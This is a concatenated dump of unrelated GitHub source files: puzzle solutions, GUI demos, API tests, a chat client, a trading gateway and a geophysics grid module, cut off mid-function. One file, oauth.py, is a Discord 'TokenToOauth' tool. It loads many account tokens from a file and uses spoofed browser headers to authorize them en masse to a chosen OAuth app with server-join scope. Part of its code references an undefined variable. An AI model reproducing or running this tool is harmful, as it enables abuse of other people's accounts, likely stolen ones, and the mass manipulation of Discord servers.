'n':\n directions.append(Direction.NORTHEAST if c2 ==\n 'e' else Direction.NORTHWEST)\n else:\n directions.append(Direction.SOUTHEAST if c2 ==\n 'e' else Direction.SOUTHWEST)\n result.append(Sequence(directions))\n return result\n\n\ndef _compute_starting_state(sequences):\n tiles = {} # coordinates --> is_black\n for seq in sequences:\n coords = (0, 0)\n for d in seq.directions:\n coords = (coords[0] + d[0], coords[1] + d[1])\n tiles[coords] = not tiles.get(coords, False)\n return tiles\n\n\ndef _count_black_tiles(tiles):\n return sum(1 for v in tiles.values() if v)\n\n\ndef count_black_tiles(sequences):\n tiles = _compute_starting_state(sequences)\n return _count_black_tiles(tiles)\n\n\ndef make_beauty_happen(sequences, days):\n tiles = _compute_starting_state(sequences)\n for _ in range(0, days):\n min_x = min(x for x, _ in tiles.keys())\n max_x = max(x for x, _ in tiles.keys())\n min_y = min(y for _, y in tiles.keys())\n max_y = max(y for _, y in tiles.keys())\n new_tiles = {}\n for x in range(min_x - 1, max_x + 2):\n for y in range(min_y - 1, max_y + 2):\n black_neighbors_count = 0\n for d in Direction.ALL:\n if tiles.get((x + d[0], y + d[1]), False):\n black_neighbors_count += 1\n is_black = tiles.get((x, y), False)\n new_value = False\n if is_black:\n if black_neighbors_count in [1, 2]:\n new_value = True\n else:\n if black_neighbors_count == 2:\n new_value = True\n new_tiles[(x, y)] = new_value\n tiles = new_tiles\n return _count_black_tiles(tiles)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('file')\n parser.add_argument('--next', action='store_true')\n args = parser.parse_args()\n\n with open(args.file, 'r') as input_file:\n lines = [l.strip() for l in input_file.readlines()]\n\n sequences = parse_sequences(lines)\n\n if args.next:\n print(make_beauty_happen(sequences, 100))\n else:\n print(count_black_tiles(sequences))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pylaligand/advent_code_2020","sub_path":"24/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18601921559","text":"from gpiozero import PWMOutputDevice, DigitalOutputDevice\n\n\nFORWARD = 1\nOFF = 0\nREVERSE = -1\n\n\nclass DCMotor:\n def __init__(self, pwm, in_1, in_2):\n self.speed = PWMOutputDevice(pin=pwm, frequency=50)\n self.in_1 = DigitalOutputDevice(pin=in_1)\n self.in_2 = DigitalOutputDevice(pin=in_2)\n self.direction = FORWARD\n\n def stop(self):\n self.speed.value = 0\n self.in_1.off()\n self.in_2.off()\n self.direction = OFF\n\n def direction_control(self, direction=None):\n try:\n self.speed.value = 0\n\n if direction == None:\n self.in_1.off()\n self.in_2.off()\n self.direction = OFF\n return True\n\n if direction == FORWARD:\n self.in_1.on()\n self.in_2.off()\n self.direction = FORWARD\n return True\n\n if direction == REVERSE:\n self.in_1.off()\n self.in_2.on()\n self.direction = REVERSE\n return True\n\n except Exception as e:\n print(str(e))\n return False\n","repo_name":"bdschnapp/remote_control_car","sub_path":"src/server/Motor.py","file_name":"Motor.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70871425449","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@Author: github.com/imvast\r\n@Date: 5/24/2023\r\n\"\"\"\r\n\r\nfrom httpx import Client\r\nfrom tls_client import Session\r\nfrom os import system\r\nfrom threading import Thread\r\nfrom colorama import Fore\r\nfrom terminut import printf as print, inputf as input, init; init(colMain=Fore.MAGENTA)\r\n\r\n\r\nclass Oauth:\r\n def __init__(self, uri) -> None:\r\n self.client = Session(client_identifier=\"firefox_111\", random_tls_extension_order=True) \r\n self.session = Client()\r\n self.uri = uri\r\n\r\n def getUris(self):\r\n if \"https://restorecord.com/verify\" in self.uri:\r\n return print(\"RestoreCord Links Not Available Yet. Use the link it sends you to after pressing verify.\")\r\n uri = \"https://discord.com\" + monk.split('href=\"https://discord.com')[1].split('\"')[0]\r\n self.oauth_reqstr = uri.split(\"/oauth2\")[0] + \"/api/v9/oauth2\" + self.uri.split(\"/oauth2\")[1]\r\n self.refer_oauth = uri\r\n elif \"oauth2/authorize\" in self.uri and not \"api/v9\" in self.uri:\r\n self.oauth_reqstr = self.uri.split(\"/oauth2\")[0] + \"/api/v9/oauth2\" + self.uri.split(\"/oauth2\")[1]\r\n self.refer_oauth = self.uri\r\n elif \"api/v9\" in self.uri:\r\n self.oauth_reqstr = self.uri\r\n self.refer_oauth = self.uri.replace(\"api/v9\", \"\")\r\n else:\r\n hd = self.session.get(self.uri)\r\n self.oauth_reqstr = hd.headers.get(\"location\") # api.v9\r\n self.refer_oauth = self.session.get(self.oauth_reqstr).text.split(\"\")[0] # https://discord.com/oauth2/authorize?response_type=code&redirect_uri=https%3A%2F%2Fgiveawaysdrops.com%2Fcallback&scope=identify%20guilds.join&client_id=715370284055789585\r\n \r\n def submitOauth(self, res):\r\n if \"location\" in res.text:\r\n locauri = res.json().get(\"location\")\r\n hosturi = locauri.replace(\"https://\", \"\").replace(\"http://\", \"\").split(\"/\")[0]\r\n headers = {\r\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\"accept-encoding\": \"gzip, deflate, br\",\"accept-language\": \"en-US,en;q=0.5\",\"connection\": \"keep-alive\",\r\n \"host\": hosturi,\r\n \"referer\": \"https://discord.com/\",\"sec-fetch-dest\": \"document\",\"sec-fetch-mode\": \"navigate\",\"sec-fetch-site\": \"cross-site\",\"sec-fetch-user\": \"?1\", \"upgrade-insecure-requests\": \"1\",\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0\"\r\n }\r\n res2 = self.session.get(locauri, headers=headers)\r\n \r\n if res2.status_code in (302, 307):\r\n return print(\"(+) Token Added To OAuth\")\r\n else:\r\n return print(f\"(-) Failed to add token to oauth | {res2.text}, {res2.status_code}\")\r\n elif \"You need to verify your account\" in res.text:\r\n return print(f\"(!) Invalid Token [{token[:25]}...]\")\r\n else:\r\n return print(f\"(!) Submit Error | {res.text}\")\r\n \r\n def main(self, token):\r\n self.getUris()\r\n payload = {\r\n \"permissions\": \"0\",\r\n \"authorize\": True\r\n }\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0',\r\n 'Accept': '*/*',\r\n 'Accept-Language': 'en-US,en;q=0.5',\r\n 'Accept-Encoding': 'gzip, deflate, br',\r\n 'Content-Type': 'application/json',\r\n 'Authorization': token,\r\n 'X-Super-Properties': 'eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRmlyZWZveCIsImRldmljZSI6IiIsInN5c3RlbV9sb2NhbGUiOiJlbi1VUyIsImJyb3dzZXJfdXNlcl9hZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzExMS4wIiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTExLjAiLCJvc192ZXJzaW9uIjoiMTAiLCJyZWZlcnJlciI6IiIsInJlZmVycmluZ19kb21haW4iOiIiLCJyZWZlcnJlcl9jdXJyZW50IjoiIiwicmVmZXJyaW5nX2RvbWFpbl9jdXJyZW50IjoiIiwicmVsZWFzZV9jaGFubmVsIjoic3RhYmxlIiwiY2xpZW50X2J1aWxkX251bWJlciI6MTg3NTk5LCJjbGllbnRfZXZlbnRfc291cmNlIjpudWxsfQ==',\r\n 'X-Discord-Locale': 'en-US',\r\n 'X-Debug-Options': 'bugReporterEnabled',\r\n 'Origin': 'https://discord.com',\r\n 'Connection': 'keep-alive',\r\n 'Referer': self.refer_oauth,\r\n 'Sec-Fetch-Dest': 'empty',\r\n 'Sec-Fetch-Mode': 'cors',\r\n 'Sec-Fetch-Site': 'same-origin',\r\n 'TE': 'trailers',\r\n }\r\n res = self.client.post(self.oauth_reqstr, headers=headers, json=payload)\r\n if res.status_code == 401:\r\n return print(f\"(!) Invalid Token [{token[:25]}...]\")\r\n if res.status_code == 200:\r\n try:\r\n return self.submitOauth(res)\r\n except Exception as e:\r\n return print(f\"(!) Error | {e}\")\r\n else:\r\n return print(f\"(!) Error | {res.text}\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n # url example : http://giveaways.party/login/auth\r\n system(\"cls\")\r\n x1 = Fore.MAGENTA\r\n x2 = Fore.LIGHTMAGENTA_EX\r\n print(\"\"\"\r\n %s╔═╗%s┌─┐┬ ┬┌┬┐┬ ┬%s╔╦╗%s┌─┐┬┌─┌─┐┌┐┌\r\n %s║ ║%s├─┤│ │ │ ├─┤%s ║ %s│ │├┴┐├┤ │││\r\n %s╚═╝%s┴ ┴└─┘ ┴ ┴ ┴%s ╩ %s└─┘┴ ┴└─┘┘└┘\r\n { %sdiscord.gg/vast%s }\r\n %s\"\"\" % (x2, x1, x2, x1, x2, x1, x2, x1, x2, x1, x2, x1, x2, x1, Fore.RESET), showTimestamp=False)\r\n \r\n url = input(\"(?) Auth URL > \")\r\n auth = Oauth(uri=url)\r\n \r\n with open('tokens.txt', 'r+') as f: \r\n tokens = f.read().splitlines()\r\n for token in tokens:\r\n Thread(target=auth.main, args=(token,)).start()\r\n","repo_name":"imvast/TokenToOauth","sub_path":"oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"3407053102","text":"import warnings\n\nfrom util import gen_util, plot_util\n\n\n# skip tight layout warning\nwarnings.filterwarnings(\"ignore\", message=\"This figure includes*\")\n\n\nVDASH = (0, (3, 2))\nHDASH = (0, (4, 2))\nDARKRED = \"#871719\"\nNEARBLACK = \"#656565\"\nMOUSE_COL_INTERVAL = 0.3\n\nN_LINPLA = 4\n\n\n#############################################\ndef get_colors(col_name, line=\"L2/3\"):\n \"\"\"\n get_colors(col_name)\n\n Returns exact color for a specific line.\n\n Required args:\n - col_name (str): \n color name\n\n Optional args:\n - line (str): \n line to plot\n default: \"L2/3\"\n \n Returns:\n - col (str): color\n \"\"\"\n \n if line in [\"L23\", \"L23-Cux2\"] :\n col = plot_util.get_color_range(1, col_name)[0]\n elif line in [\"L5\", \"L5-Rbp4\"]:\n col = plot_util.get_color_range(6, col_name)[4]\n else:\n raise ValueError(f\"Line '{line}' not recognized\")\n\n return col\n\n\n#############################################\ndef get_line_plane_name(line=\"L2/3-Cux2\", plane=\"soma\"):\n \"\"\"\n get_line_plane_name()\n\n Returns line/plane short name.\n\n Optional args:\n - line (str):\n line name\n default: \"L2/3-Cux2\"\n - plane (str):\n plane_name\n default: \"soma\"\n\n Returns:\n - line_plane_name (str):\n short name for the line/plane\n \"\"\"\n\n line = line.split(\"-\")[0].replace(\"23\", \"2/3\")\n line_plane_name = f\"{line}-{plane[0].upper()}\"\n\n return line_plane_name\n\n\n#############################################\ndef get_line_plane_idxs(line=\"L23-Cux2\", plane=\"soma\", flat=False):\n \"\"\"\n get_line_plane_idxs()\n\n Returns parameters for a line/plane combination graph.\n\n Optional args:\n - line (str):\n line name\n default: \"L2/3-Cux2\"\n - plane (str):\n plane_name\n default: \"soma\"\n\n Returns:\n if flat:\n - idx (int):\n line/plane index\n \n else:\n - li (int): \n line index\n - pl (int): \n plane index\n\n and in both cases:\n - col (str): \n color hex code\n - dash (tuple or None): \n dash pattern\n \"\"\"\n\n lines, planes = [\"L23-Cux2\", \"L5-Rbp4\"], [\"dend\", \"soma\"]\n pla_col_names = [\"green\", \"blue\"]\n\n if line not in lines:\n gen_util.accepted_values_error(\"line\", line, lines)\n if plane not in planes:\n gen_util.accepted_values_error(\"plane\", plane, planes)\n\n li = lines.index(line)\n pl = planes.index(plane)\n col = get_colors(pla_col_names[pl], line=line)\n dash = VDASH if \"L5\" in line else None\n\n if flat:\n idx = pl + li * len(lines)\n return idx, col, dash\n\n else:\n return li, pl, col, dash\n\n\n","repo_name":"colleenjg/OpenScope_CA_Analysis","sub_path":"plot_fcts/plot_helper_fcts.py","file_name":"plot_helper_fcts.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"5829166760","text":"import pytest\nimport json\nfrom Features.get_booking import get_booking_ids,get_booking_details\n\ntarget_url = \"https://restful-booker.herokuapp.com/booking/\"\n\nbooking_body = {'firstname': 'Feed', \n 'lastname': 'Cuong', \n 'totalprice': 2000, \n 'depositpaid': True, \n 'bookingdates': {'checkin': '2023-09-01', 'checkout': '2023-08-10'}, \n 'additionalneeds': 'super bowls'}\n\nbooking_data = [(4443, {\n \"firstname\": \"Josh\",\n \"lastname\": \"Allen\",\n \"totalprice\": 111,\n \"depositpaid\": True,\n \"bookingdates\": {\n \"checkin\": \"2018-01-01\",\n \"checkout\": \"2019-01-01\"\n },\n \"additionalneeds\": \"super bowls\"\n}\n)]\n# run get_booking.py to get new booking data\nwith open('booking_data.txt', 'r') as filehandle:\n booking_data2 = json.load(filehandle)\n filehandle.close()\nwith open('create_booking_data.txt', 'r') as filehandle:\n create_booking_data = json.load(filehandle)\n \n\ndef test_get_booking_ids():\n test_response = get_booking_ids()\n for i in test_response:\n booking_key = list(i.keys())\n assert \"bookingid\" == booking_key[0], f\"One of the response have difference key name = {i}\"\n assert i.get(\"bookingid\") > 0, f\"The response have invalid booking id = {i}\"\n\n\ndef test_get_booking_details():\n assert get_booking_details(create_booking_data[0][0]) == booking_body, f\"The booking {create_booking_data[0][0]} has different detail\"\n\n@pytest.mark.parametrize(\"bookingid,booking_body\",booking_data)\ndef test_get_booking_details_with_parametrize(bookingid,booking_body):\n assert get_booking_details(bookingid) == booking_body, f\"The booking {bookingid} has different detail\"\n\n@pytest.mark.parametrize(\"bookingid2,booking_body2\",booking_data2)\ndef test_get_booking_details_with_parametrize2(bookingid2,booking_body2):\n assert get_booking_details(bookingid2) == booking_body2, f\"The booking {bookingid2} has different detail\"\n\n@pytest.mark.parametrize(\"create_booking_id,create_booking_body\",create_booking_data)\ndef test_get_created_booking_details(create_booking_id,create_booking_body):\n assert get_booking_details(create_booking_id) == create_booking_body, f\"The booking {create_booking_id} has different detail\"","repo_name":"dkexe/Python2023","sub_path":"request_training/Tests/test_2_getbooking_detail.py","file_name":"test_2_getbooking_detail.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35552657969","text":"import sys\n\nfrom pages.pages import Pages\nfrom PyQt5.QtWidgets import QApplication, QWidget, QVBoxLayout\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Labs\")\n self.resize(600, 1000)\n layout = QVBoxLayout()\n self.setLayout(layout)\n self.pages = Pages()\n layout.addWidget(self.pages)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = Window()\n window.show()\n sys.exit(app.exec())\n","repo_name":"Yumashev-Nikita/QT_LABS","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6606428812","text":"from datetime import datetime\r\n\r\ndef check_freshness(purchase_date, expiration_date, consumption_date):\r\n try:\r\n purchase_date = datetime.strptime(purchase_date, \"%Y-%m-%d\")\r\n expiration_date = datetime.strptime(expiration_date, \"%Y-%m-%d\")\r\n consumption_date = datetime.strptime(consumption_date, \"%Y-%m-%d\")\r\n\r\n if purchase_date > expiration_date:\r\n print(\"Invalid input: Purchase date cannot be later than the expiration date.\")\r\n return\r\n\r\n if consumption_date < purchase_date:\r\n print(\"Invalid input: Consumption date cannot be earlier than the purchase date.\")\r\n return\r\n\r\n freshness_period = expiration_date - purchase_date\r\n days_since_purchase = consumption_date - purchase_date\r\n\r\n if days_since_purchase <= freshness_period:\r\n print(\"The food is fresh.\")\r\n else:\r\n print(\"Warning: The food may not be fresh anymore.\")\r\n print(\"Days since purchase: {}\".format(days_since_purchase.days))\r\n print(\"Freshness period: {} days\".format(freshness_period.days))\r\n\r\n except ValueError:\r\n print(\"Invalid date format. Please use the format YYYY-MM-DD.\")\r\n\r\n# Example usage\r\npurchase_date = \"2023-05-20\"\r\nexpiration_date = \"2023-05-30\"\r\nconsumption_date = \"2023-05-26\"\r\n\r\ncheck_freshness(purchase_date, expiration_date, consumption_date)\r\n","repo_name":"roomaustin/Expiration","sub_path":"expiration.py","file_name":"expiration.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72138886887","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('hello_django', '0005_auto_20150427_0510'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='answer',\n name='created',\n field=models.DateTimeField(default=datetime.datetime.now),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='answer',\n name='rating',\n field=models.IntegerField(default=0),\n preserve_default=True,\n ),\n ]\n","repo_name":"kirill-m/web-dz","sub_path":"hello_django/migrations/0006_auto_20150427_0520.py","file_name":"0006_auto_20150427_0520.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9162641664","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dynamic_costs', '0005_dynamiccost_apartment'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='dynamiccost',\n old_name='apartment',\n new_name='apartments',\n ),\n ]\n","repo_name":"Happyandhappy/django_email","sub_path":"dynamic_costs/migrations/0006_auto_20141112_1219.py","file_name":"0006_auto_20141112_1219.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13901313335","text":"import sys\nfrom PyQt6.QtWidgets import *\n\n\nclass DlgMain(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle('My GUI')\n self.setGeometry(50, 50, 500, 500)\n\n self.combo = QComboBox(self)\n self.combo.move(50, 50)\n # self.combo.addItems(['A', 'B', 'C', 'D', 'E', 'F', 'G'])\n self.combo.addItem('Apple', {'a': 'A', 'pop': 400402340})\n self.combo.addItem('Banana', {'b': 'B', 'pop': 400000000})\n self.fruitlabel = QLabel(f'Fruit: {self.combo.itemData(0)[\"pop\"]}', self)\n self.combo.currentIndexChanged.connect(self.combo_changed)\n self.combo.highlighted.connect(self.combo_highlighted)\n\n self.edit_combo = QComboBox(self)\n self.edit_combo.move(200, 50)\n self.edit_combo.setEditable(True)\n self.edit_combo.setDuplicatesEnabled(False)\n self.edit_combo.addItem('Apple', 'a')\n self.edit_combo.addItem('Banana', 'b')\n self.edit_combo.currentIndexChanged.connect(self.edit_combo_changed)\n\n def edit_combo_changed(self, i):\n if not self.edit_combo.itemData(i):\n text, boo = QInputDialog.getText(self, 'Add Species Code',\n f'Add species code for {self.edit_combo.itemText(i)}')\n if boo:\n self.edit_combo.setItemData(i, text)\n QMessageBox.information(self, 'Plants', f'You selected {self.edit_combo.itemData(i)}')\n\n def combo_changed(self, i):\n self.fruitlabel.setText(f'Fruit: {self.combo.itemData(i)[\"pop\"]}')\n QMessageBox.information(self, 'Combobox', f'You selected {self.combo.itemData(i)}')\n\n def combo_highlighted(self, i):\n self.fruitlabel.setText(f'HELLO {self.combo.itemText(i)}')\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n main = DlgMain()\n main.show()\n sys.exit(app.exec())\n","repo_name":"throwmeister/gui_experiments","sub_path":"guis/combobox.py","file_name":"combobox.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28965482855","text":"#chat client创建\n#code = utf-8\nfrom socket import *\nimport os, sys\n\ndef recv_msg(s):\n while True:\n data, addr = s.recvfrom(1024)\n #服务器发来EXIT表示退出\n if data.decode()==\"EXIT\":\n sys.exit(0)\n print(data.decode())\n#发送消息\ndef send_msg(s, name ,ADDR):\n while True:\n text = input(\"消息:\")\n #输入##表示退出聊天室\n if text ==\"##\":\n msg = \"Q \"+name\n s.sendto(msg.encode(),ADDR)\n sys.exit(\"我已经退出聊天室\")\n msg = \"C %s %s \"%(name,text)\n s.sendto(msg.encode(),ADDR) \n#创建套接字\ndef main():\n #从命令行输入IP\n if len(sys.argv)<3:\n print(\"argv is error\")\n return\n HOST = sys.argv[1]#认为是IP\n PORT = int(sys.argv[2])#认为是端口\n ADDR = (HOST,PORT)\n #创建套接字\n s = socket(AF_INET, SOCK_DGRAM)\n while True:\n name = input(\"输入姓名:\")\n msg = \"L \"+name\n #发送给服务器, "L "是表示位,目的是服务端识别\n s.sendto(msg.encode(),ADDR)\n #等待回应\n data, addr = s.recvfrom(128)\n if data.decode() ==\"ok\":\n print(\"你已经进入聊天室!\")\n break\n else:\n print(data.decode())\n #创建父子进程\n pid = os.fork()\n if pid < 0:\n sys.exit(\"创建进程失败!\")\n #发送消息\n elif pid ==0:\n send_msg(s,name,ADDR)\n #接收到消息\n else:\n recv_msg(s)\n\nmain()","repo_name":"mrliuminlong/note","sub_path":"practise/chatroom/chat_client.py","file_name":"chat_client.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26792344786","text":"# -*- coding:utf-8 -*-\r\n\"\"\"\r\n@FileName :qmt_gateway.py\r\n@Time :2022/11/8 16:49\r\n@Author :fsksf\r\n\"\"\"\r\nfrom collections import defaultdict\r\nfrom typing import Dict, List\r\nfrom vnpy.event import Event, EventEngine\r\nfrom vnpy.trader.event import (\r\n EVENT_TIMER,\r\n EVENT_TICK\r\n)\r\nfrom vnpy.trader.constant import (\r\n Product, Direction, OrderType, Exchange\r\n\r\n)\r\nfrom vnpy.trader.gateway import BaseGateway\r\nfrom vnpy.trader.object import (\r\n OrderRequest,\r\n CancelRequest,\r\n SubscribeRequest,\r\n ContractData,\r\n)\r\n\r\nfrom vnpy_qmt.md import MD\r\nfrom vnpy_qmt.td import TD\r\n\r\n\r\nclass QmtGateway(BaseGateway):\r\n\r\n default_setting: Dict[str, str] = {\r\n \"交易账号\": \"\",\r\n \"mini路径\": \"\"\r\n }\r\n\r\n TRADE_TYPE = (Product.ETF, Product.EQUITY, Product.BOND, Product.INDEX)\r\n exchanges = (Exchange.SSE, Exchange.SZSE)\r\n\r\n def __init__(self, event_engine: EventEngine, gateway_name: str = 'QMT'):\r\n super(QmtGateway, self).__init__(event_engine, gateway_name)\r\n self.contracts: Dict[str, ContractData] = {}\r\n self.md = MD(self)\r\n self.td = TD(self)\r\n self.components: Dict[str, List[BasketComponent]] = defaultdict(list)\r\n self.count = -1\r\n self.event_engine.register(EVENT_TIMER, self.process_timer_event)\r\n\r\n def connect(self, setting: dict) -> None:\r\n self.md.connect(setting)\r\n self.td.connect(setting)\r\n\r\n def close(self) -> None:\r\n self.md.close()\r\n\r\n def subscribe(self, req: SubscribeRequest) -> None:\r\n return self.md.subscribe(req)\r\n\r\n def send_order(self, req: OrderRequest) -> str:\r\n return self.td.send_order(req)\r\n\r\n def cancel_order(self, req: CancelRequest) -> None:\r\n return self.td.cancel_order(req.orderid)\r\n\r\n def query_account(self) -> None:\r\n self.td.query_account()\r\n\r\n def query_position(self) -> None:\r\n self.td.query_position()\r\n\r\n def query_order(self):\r\n self.td.query_order()\r\n\r\n def query_trade(self):\r\n self.td.query_trade()\r\n\r\n def on_contract(self, contract):\r\n self.contracts[contract.vt_symbol] = contract\r\n super(QmtGateway, self).on_contract(contract)\r\n\r\n def get_contract(self, vt_symbol):\r\n return self.contracts.get(vt_symbol)\r\n\r\n def process_timer_event(self, event) -> None:\r\n if not self.td.inited:\r\n return\r\n if self.count == -1:\r\n self.query_trade()\r\n self.count += 1\r\n if self.count < 21:\r\n return\r\n self.query_account()\r\n self.query_position()\r\n self.query_order()\r\n self.count = 0\r\n\r\n def write_log(self, msg):\r\n super(QmtGateway, self).write_log(f\"[QMT] {msg}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n qmt = QmtGateway(None)\r\n qmt.subscribe(SubscribeRequest(symbol='000001', exchange=Exchange.SZSE))\r\n qmt.md.get_contract()\r\n\r\n import threading\r\n import time\r\n\r\n def slp():\r\n while True:\r\n time.sleep(0.1)\r\n t = threading.Thread(target=slp)\r\n t.start()\r\n t.join()","repo_name":"ruyisee/vnpy_qmt","sub_path":"vnpy_qmt/qmt_gateway.py","file_name":"qmt_gateway.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"75115184487","text":"from builtins import range\nimport math\nimport numpy as num\nfrom pyrocko.guts import Object, Float\nfrom pyrocko import orthodrome as od\n\nfrom silvertine.seiger_lassie import geo\n\nguts_prefix = 'seiger_lassie'\n\n\nclass Grid(Object):\n pass\n\n\nclass Carthesian3DGrid(Grid):\n lat = Float.T(default=0.0)\n lon = Float.T(default=0.0)\n xmin = Float.T()\n xmax = Float.T()\n ymin = Float.T()\n ymax = Float.T()\n zmin = Float.T()\n zmax = Float.T()\n dx = Float.T()\n dy = Float.T()\n dz = Float.T()\n\n def __init__(self, **kwargs):\n for k in kwargs.keys():\n kwargs[k] = float(kwargs[k])\n\n Grid.__init__(self, **kwargs)\n self.update()\n\n def size(self):\n nx, ny, nz = self._shape()\n return nx * ny * nz\n\n def max_delta(self):\n return max(self.dx, self.dy, self.dz)\n\n def update(self):\n self._coords = None\n\n def _shape(self):\n nx = int(round(((self.xmax - self.xmin) / self.dx))) + 1\n ny = int(round(((self.ymax - self.ymin) / self.dy))) + 1\n nz = int(round(((self.zmax - self.zmin) / self.dz))) + 1\n return nx, ny, nz\n\n def _get_coords(self):\n if self._coords is None:\n nx, ny, nz = self._shape()\n x = num.linspace(self.xmin, self.xmax, nx)\n y = num.linspace(self.ymin, self.ymax, ny)\n z = num.linspace(self.zmin, self.zmax, nz)\n self._coords = x, y, z\n\n return self._coords\n\n def depths(self):\n nx, ny, _ = self._shape()\n _, _, z = self._get_coords()\n return num.repeat(z, nx*ny)\n\n def index_to_location(self, i):\n nx, ny, nz = self._shape()\n iz, iy, ix = num.unravel_index(i, (nz, ny, nx))\n x, y, z = self._get_coords()\n return self.lat, self.lon, x[ix], y[iy], z[iz]\n\n def lateral_distances(self, receivers):\n nx, ny, nz = self._shape()\n x, y, z = self._get_coords()\n\n rx, ry = geo.points_coords(\n receivers, system=('ne', self.lat, self.lon))\n\n na = num.newaxis\n\n nr = len(receivers)\n\n distances = num.sqrt(\n (x[na, na, :, na] - rx[na, na, na, :])**2 +\n (y[na, :, na, na] - ry[na, na, na, :])**2).reshape((nx*ny*nr))\n\n return num.tile(distances, nz).reshape((nx*ny*nz, nr))\n\n def distances(self, receivers):\n nx, ny, nz = self._shape()\n x, y, z = self._get_coords()\n\n rx, ry = geo.points_coords(\n receivers, system=('ne', self.lat, self.lon))\n\n rz = num.array([r.z for r in receivers], dtype=num.float)\n\n na = num.newaxis\n\n nr = len(receivers)\n\n distances = num.sqrt(\n (x[na, na, :, na] - rx[na, na, na, :])**2 +\n (y[na, :, na, na] - ry[na, na, na, :])**2 +\n (z[:, na, na, na] - rz[na, na, na, :])**2).reshape((nx*ny*nz, nr))\n\n return distances\n\n def distance_max(self):\n return math.sqrt(\n (self.xmax - self.xmin)**2 +\n (self.ymax - self.ymin)**2 +\n (self.zmax - self.zmin)**2)\n\n def surface_points(self, system='latlon'):\n x, y, z = self._get_coords()\n xs = num.tile(x, y.size)\n ys = num.repeat(y, x.size)\n if system == 'latlon':\n return od.ne_to_latlon(self.lat, self.lon, xs, ys)\n elif system[0] == 'ne':\n lat0, lon0 = system[1:]\n if lat0 == self.lat and lon0 == self.lon:\n return xs, ys\n else:\n elats, elons = od.ne_to_latlon(self.lat, self.lon, xs, ys)\n return od.latlon_to_ne_numpy(lat0, lon0, elats, elons)\n\n def plot_points(self, axes, system='latlon'):\n x, y = self.surface_points(system=system)\n axes.plot(y, x, '.', color='black', ms=1.0)\n\n def plot(\n self, axes, a,\n amin=None,\n amax=None,\n z_slice=None,\n cmap=None,\n system='latlon',\n shading='gouraud',\n units=1.,\n artists=[]):\n\n if system == 'latlon':\n assert False, 'not implemented yet'\n\n if not (system[1] == self.lat and system[2] == self.lon):\n assert False, 'not implemented yet'\n\n nx, ny, nz = self._shape()\n x, y, z = self._get_coords()\n\n a3d = a.reshape((nz, ny, nx))\n\n if z_slice is not None:\n iz = num.argmin(num.abs(z-z_slice))\n a2d = a3d[iz, :, :]\n else:\n a2d = num.max(a3d, axis=0)\n\n if artists:\n if shading == 'gouraud':\n artists[0].set_array(a2d.T.ravel())\n elif shading == 'flat':\n artists[0].set_array(a2d.T[:-1, :-1].ravel())\n else:\n assert False, 'unknown shading option'\n\n return artists\n\n else:\n return [\n axes.pcolormesh(\n y/units, x/units, a2d.T,\n vmin=amin, vmax=amax, cmap=cmap, shading=shading)]\n\n\ndef geometrical_normalization(grid, receivers):\n distances = grid.distances(receivers)\n\n delta_grid = grid.max_delta()\n\n delta_ring = delta_grid * 3.0\n ngridpoints, nstations = distances.shape\n 